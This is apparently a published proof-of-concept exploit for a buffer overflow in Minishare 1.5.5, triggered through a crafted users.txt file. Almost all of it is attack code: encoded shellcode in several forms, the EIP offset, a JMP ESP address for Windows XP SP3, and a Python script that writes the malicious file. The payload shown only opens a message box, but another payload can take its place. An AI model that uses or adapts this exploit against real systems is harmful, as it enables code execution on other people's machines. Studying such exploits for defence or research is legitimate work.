# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt)
# Date: 11/02/2010
# Author: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.4.0 - 1.5.5
# Tested on: Windows XP SP3 EN
# CVE:
# MessageBoxA TITLE=HAX TEXT=HAX WIN XP SP3 Shellcode
# \xbb\x48\x41\x58\x00\x53\x89\xe6\x31\xc0\x50\x56\x56\x50
# \xb8\xea\x07\x45\x7e\xff\xd0
# msfencoded MessageBoxA shellcode
# [*] x86/shikata_ga_nai succeeded with size 48 (iteration=1)
# \x33\xc9\xb1\x06\xda\xd2\xd9\x74\x24\xf4\x5b\xb8\x1f\xf9
# \xf2\x17\x83\xeb\xfc\x31\x43\x10\x03\x43\x0f\x1b\x07\xac
# \x67\x9a\xb0\xd3\x24\x95\xa7\xe5\x0a\xf5\x71\x50\xda\x4e
# \x97\x5b\x9f\xd0\x97\xb4
# ALPHA3.py x86 ascii uppercase ESP --input="shellcode-encoded"
# alpha3 encoded ascii uppercase MessageBoxA Shellcode
shellcode = (
"TYVTX10X41PZ41H4A4H1TA91TAFVTZ32PZNBFZDQE02D"
"QF0D13DJE1F4847029R9VNN0D668M194A0I5G5L2G3W3"
"M3Z19LN2A2Z1G0N2K0N4YK0JO9L9Q1S36403F0G3V2K1"
"Q9S123I1Y3N9R8M4E0G"
)
# 78 bytes till EIP
# 82 bytes till ESP
# 304 for payload
# EIP OVERWRITE
buff = "A" * 78
buff += "\x4b\x49\x48\x7e" #7E48494B JMP ESP in user32.dll win xp sp3
buff += shellcode
try:
f = open("users.txt",'w')
f.write(buff)
f.close()
print "[+] Vulnerable file created! Place the 'users.txt' file in the Minishare directory and run the program...\n"
except:
print "[-] Error occured!"